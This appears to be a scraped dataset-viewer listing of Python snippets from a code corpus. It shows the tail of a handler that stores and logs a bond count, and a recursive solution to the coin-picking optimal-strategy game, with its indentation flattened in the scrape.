Handles the response for the start of stored bond enumeration. Sets
self._num_bonds to the number of stored bonds.
args -- dictionary containing the number of stored bonds ('bonds'),
"""
self._num_bonds = args['bonds']
log.debug("num bonds = %d", args['bonds'])
|
nilq/baby-python
|
python
|
# Problem description: http://www.geeksforgeeks.org/dynamic-programming-set-31-optimal-strategy-for-a-game/
def optimal_strategy(coins):
if len(coins) == 1:
return coins[0]
elif len(coins) == 2:
return max(coins[0], coins[1])
else:
return max(coins[0] + min(optimal_strategy(coins[2:]),
optimal_strategy(coins[1:-1])),
coins[-1] + min(optimal_strategy(coins[1:-1]),
optimal_strategy(coins[:-2])))
coins = [8, 15, 3 , 7]
optimal_strategy(coins)
|
nilq/baby-python
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.